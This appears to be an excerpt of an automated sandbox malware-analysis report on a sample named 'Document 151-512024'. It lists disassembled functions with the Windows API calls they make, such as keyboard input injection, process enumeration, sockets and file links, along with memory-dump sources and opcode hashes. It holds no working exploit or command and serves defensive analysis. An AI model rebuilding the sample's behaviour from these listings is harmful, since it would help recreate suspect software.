                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: msctls_trackbar32
                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                    • Opcode ID: 1bc4e1395ef9a4f01c9102c87d6d3b95b02041953c430824817f9f9859255851
                                                                                                    • Instruction ID: 411737b83b54344ba7eeeb0b7e9fc3b9a2f56d4da9bc63263ea38ad83509ca08
                                                                                                    • Opcode Fuzzy Hash: 1bc4e1395ef9a4f01c9102c87d6d3b95b02041953c430824817f9f9859255851
                                                                                                    • Instruction Fuzzy Hash: 70110671280208BFEF205F69CC06FAB3BACEF95B54F114515FB55E2190D671DC519B10
                                                                                                    APIs
                                                                                                      • Part of subcall function 00946B57: _wcslen.LIBCMT ref: 00946B6A
                                                                                                      • Part of subcall function 009A2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009A2DC5
                                                                                                      • Part of subcall function 009A2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A2DD6
                                                                                                      • Part of subcall function 009A2DA7: GetCurrentThreadId.KERNEL32 ref: 009A2DDD
                                                                                                      • Part of subcall function 009A2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009A2DE4
                                                                                                    • GetFocus.USER32 ref: 009A2F78
                                                                                                      • Part of subcall function 009A2DEE: GetParent.USER32(00000000), ref: 009A2DF9
                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 009A2FC3
                                                                                                    • EnumChildWindows.USER32(?,009A303B), ref: 009A2FEB
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                    • String ID: %s%d
                                                                                                    • API String ID: 1272988791-1110647743
                                                                                                    • Opcode ID: 9792a80625d0f9a8f98fc6ccccf6c7bdbcc1883b913b126268e785b1865fac6e
                                                                                                    • Instruction ID: e87cf6a5be11a03803a286858e37ee5e1059505e0fc94b884f78ba6036159e9d
                                                                                                    • Opcode Fuzzy Hash: 9792a80625d0f9a8f98fc6ccccf6c7bdbcc1883b913b126268e785b1865fac6e
                                                                                                    • Instruction Fuzzy Hash: 7F11A2B1600206ABCF547F749C85FEE376AAFC5308F048075FD09AB292DE309949DBA0
                                                                                                    APIs
                                                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009D58C1
                                                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009D58EE
                                                                                                    • DrawMenuBar.USER32(?), ref: 009D58FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$InfoItem$Draw
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 3227129158-4108050209
                                                                                                    • Opcode ID: 4c1780a7a5349b742364ef31a4cb5a87c2cced8370f4474776cb27823ae7cc98
                                                                                                    • Instruction ID: 1e21f419be9026b96603dfa23710483a19a17283beaae3cd2ec1673ee9bd74ad
                                                                                                    • Opcode Fuzzy Hash: 4c1780a7a5349b742364ef31a4cb5a87c2cced8370f4474776cb27823ae7cc98
                                                                                                    • Instruction Fuzzy Hash: 46018471554218EFDB119F15DC45BAEBBB8FF45361F10C09AF849D6251DB308A84EF21
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32(?,00A118B0,009DA364,000000FC,?,00000000,00000000,?,?,?,009976CF,?,?,?,?,?), ref: 009D7805
                                                                                                    • GetFocus.USER32 ref: 009D780D
                                                                                                      • Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2
                                                                                                      • Part of subcall function 00959944: GetWindowLongW.USER32(?,000000EB), ref: 00959952
                                                                                                    • SendMessageW.USER32(00EDFC50,000000B0,000001BC,000001C0), ref: 009D787A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                    • String ID: 0n
                                                                                                    • API String ID: 3601265619-3368625520
                                                                                                    • Opcode ID: 66d2d82ce2741fafd8d6052548b637071615c70029999572cdc627956e7ba63c
                                                                                                    • Instruction ID: 10a9807dfb2297fb44216efcec59bb98474505f9e3afcd644051c015c131ac1a
                                                                                                    • Opcode Fuzzy Hash: 66d2d82ce2741fafd8d6052548b637071615c70029999572cdc627956e7ba63c
                                                                                                    • Instruction Fuzzy Hash: 370184316451408FD325DB68E898BB673F9EF8A320F58426EE525873A0DB31AC46DB40
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0099D3BF
                                                                                                    • FreeLibrary.KERNEL32 ref: 0099D3E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryProc
                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                    • API String ID: 3013587201-2590602151
                                                                                                    • Opcode ID: 9356a08de7351e32d90b4083e02380048979920e2388cf913130ca150a6da1ea
                                                                                                    • Instruction ID: 1fe90baed72e89a91b89501f7296af9804e1374af0ca3b6bdfc86d9051a0c49b
                                                                                                    • Opcode Fuzzy Hash: 9356a08de7351e32d90b4083e02380048979920e2388cf913130ca150a6da1ea
                                                                                                    • Instruction Fuzzy Hash: 0BF055A184B7329BDF355B288CD8A6D3318AF10703B948916E812F6244EB24CC84C282
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a5fc6de0d2edd867ac121448c1ea0001fc521616051ac5fde6eb072f379aa46d
                                                                                                    • Instruction ID: eb8e5398e89c0e1fa1bb2c009f34cd13b9f575b18318754c0831d62733293767
                                                                                                    • Opcode Fuzzy Hash: a5fc6de0d2edd867ac121448c1ea0001fc521616051ac5fde6eb072f379aa46d
                                                                                                    • Instruction Fuzzy Hash: 9EC14C75A0021AEFDB14CFA4C894BAEB7B9FF89704F108598E915EB251D731ED41CB90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1998397398-0
                                                                                                    • Opcode ID: 417e0441fe94c5346affd99be62dec979900341b3cf0c61919f9766970236814
                                                                                                    • Instruction ID: 9a93a7a6e4a77bb71af3c7602b5ad231aebc5da4a372a2be0789db362147f2e9
                                                                                                    • Opcode Fuzzy Hash: 417e0441fe94c5346affd99be62dec979900341b3cf0c61919f9766970236814
                                                                                                    • Instruction Fuzzy Hash: A6A10375A042109FC710DF68C595F2AB7E9EF88714F04885DF98A9B362DB34EE05CB92
                                                                                                    APIs
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A05F0
                                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A0608
                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,009DCC40,000000FF,?,00000000,00000800,00000000,?,009DFC08,?), ref: 009A062D
                                                                                                    • _memcmp.LIBVCRUNTIME ref: 009A064E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 314563124-0
                                                                                                    • Opcode ID: e93156bcb8f3e6971b68f35c129b3392b22a1547d09f724f3e87517f3791d148
                                                                                                    • Instruction ID: 67b28d90ce1f47785ade36d4020c68fef1dc37b6a730050bb1e4308562b4effd
                                                                                                    • Opcode Fuzzy Hash: e93156bcb8f3e6971b68f35c129b3392b22a1547d09f724f3e87517f3791d148
                                                                                                    • Instruction Fuzzy Hash: 8E810971A00109EFCB04DF94C988EEEB7B9FF89315F204559F516AB250DB71AE46CBA0
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: a18e4e57a5d275cb98e0e207b37b79206ee7472f25b4ba4c23476ccc7a5207a1
                                                                                                    • Instruction ID: 5c9d336dbf7a67397cbda94a384b2e665a938f48d2849aa9ec468fac7dcb3264
                                                                                                    • Opcode Fuzzy Hash: a18e4e57a5d275cb98e0e207b37b79206ee7472f25b4ba4c23476ccc7a5207a1
                                                                                                    • Instruction Fuzzy Hash: 53416C32A00111ABDB257BF99C55BBE3BACEFC1370F144626F429D23B2E67448435761
                                                                                                    APIs
                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 009C1AFD
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1B0B
                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009C1B8A
                                                                                                    • WSAGetLastError.WSOCK32 ref: 009C1B94
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$socket
                                                                                                    • String ID:
                                                                                                    • API String ID: 1881357543-0
                                                                                                    • Opcode ID: 0818264bda73a2ddfbc0b54f9c51c173a26f675f816abd49cb14704bf8a4e230
                                                                                                    • Instruction ID: 4b06432755893fc17e87afe3a104c8eca0b4d9dd3bfa0a8c3e8d325fcc80f848
                                                                                                    • Opcode Fuzzy Hash: 0818264bda73a2ddfbc0b54f9c51c173a26f675f816abd49cb14704bf8a4e230
                                                                                                    • Instruction Fuzzy Hash: 1F41A074A40201AFE720AF24C886F2977E5AB85718F54849CF91A9F3D3D772DD42CB91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1b2a1084115c88792a5300ddcc3a105629db8cb1ae253913c88b95bf07132b0
                                                                                                    • Instruction ID: 7cf5e1f4af609f7ed4c733068fa5d4ba471772fd1646d84b3a26d787b57828d1
                                                                                                    • Opcode Fuzzy Hash: f1b2a1084115c88792a5300ddcc3a105629db8cb1ae253913c88b95bf07132b0
                                                                                                    • Instruction Fuzzy Hash: B441D976A00704BFD724AF78CC41B6ABBFDEBC4710F10852AF559DB692D77199018790
                                                                                                    APIs
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009B5783
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 009B57A9
                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009B57CE
                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009B57FA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3321077145-0
                                                                                                    • Opcode ID: 16b574969418e7fcf9ba9ac74c807d5ba46b1d152e420570a6efd95f1280b3be
                                                                                                    • Instruction ID: 25c77346b8f8812451eb0b88735310195eecbc148eeb82f75df4741927d24035
                                                                                                    • Opcode Fuzzy Hash: 16b574969418e7fcf9ba9ac74c807d5ba46b1d152e420570a6efd95f1280b3be
                                                                                                    • Instruction Fuzzy Hash: 08411A35600611DFCB11DF55C544B5ABBE6EF89720B198888F84AAF362CB34FD40CB91
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00966D71,00000000,00000000,009682D9,?,009682D9,?,00000001,00966D71,8BE85006,00000001,009682D9,009682D9), ref: 0097D910
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0097D999
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0097D9AB
                                                                                                    • __freea.LIBCMT ref: 0097D9B4
                                                                                                      • Part of subcall function 00973820: RtlAllocateHeap.NTDLL(00000000,?,00A11444,?,0095FDF5,?,?,0094A976,00000010,00A11440,009413FC,?,009413C6,?,00941129), ref: 00973852
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 8999f7f944e05d5fbc30c568a1c4d1af251f1e723977c62a0f5041f08db59ce1
                                                                                                    • Instruction ID: 9f9549c2c21d601a70406a2aaf5fe6b4860afac4ac99b74dd95df7dabcfe6cf8
                                                                                                    • Opcode Fuzzy Hash: 8999f7f944e05d5fbc30c568a1c4d1af251f1e723977c62a0f5041f08db59ce1
                                                                                                    • Instruction Fuzzy Hash: 6D31CD72A0221AABDF249F64DC41EAE7BB9EF80710B058269FD08D7250EB35CD50CB90
                                                                                                    APIs
                                                                                                    • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 009AABF1
                                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 009AAC0D
                                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 009AAC74
                                                                                                    • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 009AACC6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 432972143-0
                                                                                                    • Opcode ID: 8430640e51de1a4928f18d25049e79808613d0dd4af64e312fb2acd8e6cbf7a1
                                                                                                    • Instruction ID: 14820688e9ace3ef60cfdd696f42b992b08e98d39b10cbd2558e43187af809b8
                                                                                                    • Opcode Fuzzy Hash: 8430640e51de1a4928f18d25049e79808613d0dd4af64e312fb2acd8e6cbf7a1
                                                                                                    • Instruction Fuzzy Hash: B7311470A446196FFF258F6588087FA7BBAAB8A330F04861AE4C5921D1C3798981D7D2
                                                                                                    APIs
                                                                                                    • GetForegroundWindow.USER32 ref: 009D16EB
                                                                                                      • Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
                                                                                                      • Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
                                                                                                      • Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65
                                                                                                    • GetCaretPos.USER32(?), ref: 009D16FF
                                                                                                    • ClientToScreen.USER32(00000000,?), ref: 009D174C
                                                                                                    • GetForegroundWindow.USER32 ref: 009D1752
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2759813231-0
                                                                                                    • Opcode ID: 3de5ac193eb9df274e94c36878ece386ff713bd68b69041b023a4e35605e74d7
                                                                                                    • Instruction ID: df10ea597d92acb06cfe8fa0fe0fec52f666de6a7183d219a69396e9011df964
                                                                                                    • Opcode Fuzzy Hash: 3de5ac193eb9df274e94c36878ece386ff713bd68b69041b023a4e35605e74d7
                                                                                                    • Instruction Fuzzy Hash: B3314FB5D01249AFC704EFA9C881DAEBBFDEF89304B5080AAE415E7211D735DE45CBA0
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 009AD501
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 009AD50F
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 009AD52F
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009AD5DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 420147892-0
                                                                                                    • Opcode ID: 1aaaa85780418d799500c292283fc6a4f05e31e8fe1e3b1c5c3ca5aa434e8c60
                                                                                                    • Instruction ID: ce51afbb9362db6ee05d10715258e429b8ea194cab396ae4ca718f276f1d3d14
                                                                                                    • Opcode Fuzzy Hash: 1aaaa85780418d799500c292283fc6a4f05e31e8fe1e3b1c5c3ca5aa434e8c60
                                                                                                    • Instruction Fuzzy Hash: 4D3181711083019FD305EF54D885FAFBBE8EFDA354F14092DF586862A2EB719948CB92
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,009DCB68), ref: 009AD2FB
                                                                                                    • GetLastError.KERNEL32 ref: 009AD30A
